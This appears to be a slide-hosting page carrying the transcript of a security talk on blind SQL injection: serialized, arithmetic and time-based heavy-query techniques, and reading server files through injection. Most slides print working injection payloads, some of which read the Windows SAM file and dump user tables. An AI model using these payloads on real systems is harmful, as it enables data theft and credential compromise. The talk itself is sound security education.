1 / 54

(Re) Playing with (Blind) SQL Injection

(Re) Playing with (Blind) SQL Injection. José Palazón “ Palako ” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security. Spain (…not only bulls…). SQL Injection attacks. A long time ago, in a galaxy far, far away….

thanos
Download Presentation

(Re) Playing with (Blind) SQL Injection

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. (Re) Playing with (Blind) SQL Injection José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security

  2. Spain (…not only bulls…)

  3. SQL Injection attacks A long time ago, in a galaxy far, far away… http://www.phrack.org/issues.html?id=8&issue=54

  4. Agenda • Serialized SQL Injection • Demo: XML Extractor • Arithmetic SQL Injection • Divide byZero • Sums and subtractions • Typeoveflow • Demo • RemoteFileDownloadingusingBlind SQL Injection • SQL Sever • MySQL • Oracle • Demo: RFD Tool • Time-BasedBlind SQL Injectionusing heavy queries • Demo: MarathonTool

  5. Serialized SQL Injection

  6. Serialized SQL Injection • Goal: To Merge complex resultsets in a single showable field • XML serialization functions allow to convert a resultset into a one XML string. • It´s possible to download big amount of data with single and simple injections.

  7. SQL Server • FOR XML: Retrieves data as a single stringrepresentingan XML tree. • RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. • BINARY BASE64:The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. • union select '1','2','3',(select * from sysusers for xml raw, binary base64) • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. • Described by DaniKachakil

  8. MySQL • No default XML support, requires a server side extension • GROUP_CONCAT (v 4.1+)

  9. Oracle • xmlforest, xmlelement,… • No * support

  10. Demo: Serialized SQL Injection

  11. Arithmetic Blind SQL Injection

  12. Blind Attacks • Attacker injects code but can´t access directly to the data. • However this injection changes the behavior of the web application. • Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. • Blind SQL Injection • Biind Xpath Injection • Blind LDAP Injection

  13. Blind SQL Injection Attacks • Attacker injects: • “True where clauses” • “False where clauses“ • Ex: • Program.php?id=1 and 1=1 • Program.php?id=1 and 1=2 • Program doesn’t return any visible data from database or data in error messages. • The attacker can´t see any data extracted from the database.

  14. Blind SQL Injection Attacks • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: • Different hashes • Different html structure • Different patterns (keywords) • Different linear ASCII sums • “Different behavior” • By example: Response Time

  15. Blind SQL Injection Attacks • If any difference exists, then: • Attacker can extract all information from database • How? Using “booleanization” • MySQL: • Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) • “True-Answer Page” or “False-Answer Page”? • MSSQL: • Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) • Oracle: • Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)

  16. Arithmetic Blind SQL Injection • The query force the parameter to be numeric • SELECT field FROM table WHERE id=abs(param) • Boolean logic is created with math operations • Divide by zero • Sums and subtractions • Type overflows

  17. Arithmetic Blind SQL Injection • Divide by zero (David Litchfield) • Id=A+(1/(ASCII(B)-C)) • A-> Param value originally used in the query. • B -> Value we are searching for, e.g.: Substring(passwd,1,1) • C-> Counter [0..255] • When ASCII(B)=C, the DB will generate a divide by zero exception.

  18. Arithmetic Blind SQL Injection • Sums and subtractions • Id=A+ASCII(B)-C • A-> Param value originally used in the query. • B -> Value we are searching for, e.g.: Substring(passwd,1,1) • C-> Counter [0..255] • When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A

  19. Arithmetic Blind SQL Injection • Value type overflow • Id=A+((C/ASCII(B))*(K)) • A-> Param value originally used in the query. • B -> Value we are searching for, e.g.: Substring(passwd,1,1) • C-> Counter [0..255] • K-> Value that overflows the type defined for A • (e.g. if A is integer, then K=2^32) • When C/ASCII(B)==1, K*1 overflows the data type

  20. Demo: • Divide by zero • Sums and subtractions • Integer overflow

  21. Remote File Downloading using Blind SQL Injection techniques

  22. Accessing Files • Two ways: • Load the file in a temp table • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? • Load the file in the query • With every query the file is loaded in memory • I am very sorry, engine  • and i>ASCII(Substring(load_file(file,pos,1))??

  23. SQL Server 2K - External Data Sources • Only for known filetypes: • Access trough Drivers: Txt, csv, xls, mdb, log • And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt’),1,1)) • Privileges • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0 • By default this key doesn´t exist so only users with Server Admin Role can use these functions. • NTFS permissions

  24. SQL Server 2K – Bulk option • Access to any file • ; Create Table TempTable as (row varchar(8000)) -- • ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n‘) -- • ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – • and (select COUNT(row) from TempTable) • and (select top 1 len(row) from TempTable where num = rownum) • and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) • ; Drop Table TempTable-- • Privileges needed • Server Role: Bulkadmin • Database Role: db_owner o db_ddladmin • NTFS permissions

  25. SQL Server 2k5 – 2k8 • OPENDATASOURCE and OPENROWSET supported • Bulk options improved • AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))— • Permisions • Bulkadmin Server Role • External Data Sources enabled • Sp_configure • Surface configuration Tool for features

  26. MySQL • LoadFile • SELECT LOAD_FILE(0x633A5C626F6F742E696E69) • SQLbfTools: MySQLgetcommand (illo and dab) • http://www.reversing.org/node/view/11 • Load Data infile • ; Create table C8DFC643 (datosvarchar(4000)) • ; Load data infile 'c:\\boot.ini' into table C8DFC643 • ; alter table C8DFC643 add column num integer auto_increment unique key • and (select count(num) from C8DFC643) • and (select length(datos) from C8DFC643 where num = 1) • and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) • ; Drop table C8DFC643

  27. Oracle – Plain Text files • External Tables • ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- • ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- • Only Plain Text files

  28. Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --

  29. Demo RFD

  30. Time-based Blind SQL Injection using heavy queries

  31. Time-Based Blind SQL Injection • In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. • Injection forces a delay in the response page when the condition injected is True. - Delay functions: • SQL Server: waitfor • Oracle: dbms_lock.sleep • MySQL: sleep or Benchmark Function • Postgres: pg_sleep • Ex: • ; if (exists(select * fromusers)) waitfordelay '0:0:5’

  32. Exploit for Solar Empire Web Game

  33. Deep Blind SQL Injection • Time delaydependsonthewantedvalue. • E.g. “a”->10s. delay, “b”->11s. Delay, … • http://labs.portcullis.co.uk/application/deep-blind-sql-injection/

  34. Time-Based Blind SQL Injection • What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? • Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?

  35. Yes, we can!

  36. “Where-Clause” execution order Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?

  37. The heavy condition first

  38. The light condition first

  39. Time-Based Blind SQL Injectionusing Heavy Queries • Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. • It depends on how the database engine evaluates the where clauses in the query. • There are two types of database engines: • Databases without optimization process • Databases with optimization process

  40. Time-Based Blind SQL Injectionusing Heavy Queries • Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. • The Cross-join injection must be heavier than the other condition. • Attacker only have to know or to guess the name of a table with select permission in the database. • Example in MSSQL: • Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

  41. “Default” tablestoconstruct a heavy query • Microsoft SQL Server • sysusers • Oracle • all_users • MySQL (versión 5) • information_schema.columns • Microsoft Access • MSysAccessObjects (97 & 2000 versions) • MSysAccessStorage (2003 & 2007)

  42. “Default” tablestoconstruct a heavy query • …or whatever you can guess • Clients • Customers • News • Logins • Users • Providers • ….Use your imagination…

  43. Ex 1: MS SQL Server Query lasts 14 seconds -> True-Answer

  44. Ex 1: MS SQL Server • Query lasts 1 second -> False-Answer

  45. Ex 2: Oracle Query Lasts 22 seconds –> True-Answer

  46. Ex 2: Oracle Query Lasts 1 second –> False-Answer

  47. Ex 3: Access 2000 Query Lasts 6 seconds –> True-Answer

  48. Ex 3: Access 2000 Query Lasts 1 second –> False-Answer

  49. Ex 4: Access 2007 Query Lasts 39 seconds –> True-Answer

  50. Ex 4: Access 2007 Query Lasts 1 second –> False-Answer

More Related